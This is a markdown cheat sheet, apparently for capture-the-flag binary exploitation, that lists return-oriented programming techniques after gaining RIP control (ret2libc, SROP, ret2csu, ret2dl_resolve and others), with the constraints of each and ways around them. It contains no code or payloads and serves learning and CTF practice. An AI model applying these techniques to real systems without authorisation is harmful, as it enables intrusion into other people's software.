# What after RIP control? So, you got RIP control. Now what? ## ROP techniques ### NX Disabled #### ret2shellcode, ret2reg etc * **Constraints:** - You have to know address of the shellcode - Non-PIE for ret2reg [[1]](#Notes) - Address of the shellcode is stored in a register - Need a jmp2reg gadget * **Solutions:** - Other ROP attacks to get the address ### Win/flag function #### ret2win * **Constraints:** - Non-PIE [[1]](#Notes) - Win function requires arguments * **Solutions:** - Get a binary leak - Use pop gadgets or ret2csu (requires buffer overflow with > 0x8 bytes upper limit) ### Have a libc leak and could only write 8 bytes #### ret2one_gadget * **Constraints:** - Need a libc leak - Need to know libc version of the remote server - The constraints of the one_gadget must be satisfied * **Solutions:** - If binary is Non-PIE, leak a libc pointer from GOT (requires bof with > 0x8 bytes upper limit) - Use [libc-database](https://github.com/niklasb/libc-database) - That's tricky ### Any printing function e.g. puts, printf, write #### ret2libc * **Constraints:** - Non-PIE [[1]](#Notes) - Need a function which prints bytes - Binary should not be hand-written - Binary should be dynamically linked - Need to know libc version of the remote server - Need a buffer overflow with >= 0x20 upper limit * **Solutions:** - Get a binary leak - That's usually the case - Who writes binaries by hand? - That's usually the case. (If it isn't then you have easier options) [General ROP](#General-ROP-pop-pop-pop) - Use [libc-database](https://github.com/niklasb/libc-database) - That's your problem ### Binary has syscall gadget #### Sigreturn Return Oriented Programming (SROP) * **Constraints:** - Non-PIE [[1]](#Notes) - Need a syscall gadget - Need control over RAX - Need to have a buffer overflow with > 0x250 upper limit - Need address of a writable area for RSP in some cases * **Solutions:** - Get a binary leak - Get a libc leak. LibC has syscalls gadgets - RAX can be controlled using functions like read, write or any function whose return value can be controlled - You can read your ROP chain at some known address and then stack pivot. (requires a stack pivot gadget) - Sometimes you need to call functions which need a functional stack. Just use bss addresses. ### Need to call a function with three arguments #### ret2csu * **Constraints:** - Non-PIE [[1]](#Notes) - Need to have a buffer overflow with > 0x50 upper limit - Need a pointer to a function which does nothing to the concerned registers i.e. RDI, RSI and RDX e.g. \_fini * **Solutions:** - Get a binary leak - You can read your ROP chain at some known address and then stack pivot. (requires a stack pivot gadget). If that's not possible then its your problem - Write address of a ret gadget somewhere and use its pointer. ### There are no printing functions and you can write to a large area #### ret2dl_resolve * **Constraints:** - Non-PIE [[1]](#Notes) - Need the ability to write to an area reachable by resolution mechanism e.g. bss or stack - NO RELRO or Partial RELRO * **Solutions:** - Get a binary leak - Thats an easy one - If you can somehow get link_map and dl_resolve address, you're fine. These are not stored in the binary in Full RELRO ### Statically Linked binary #### General ROP pop pop pop * **Constraints:** - Non-PIE [[1]](#Notes) - The binary should have gadgets for concerned registers i.e. RAX, RDI, RSI, RDX etc. * **Solutions:** - Get a binary leak - Use SROP (requires a RAX gadget and buffer overflow with > 0x250 upper limit) ### Notes: [1]: Non-PIE requirement applies to almost all of them. It can be circumvented by getting a binary leak using format strings, incorrect or absence of null-termination of strings and uninitialized variables.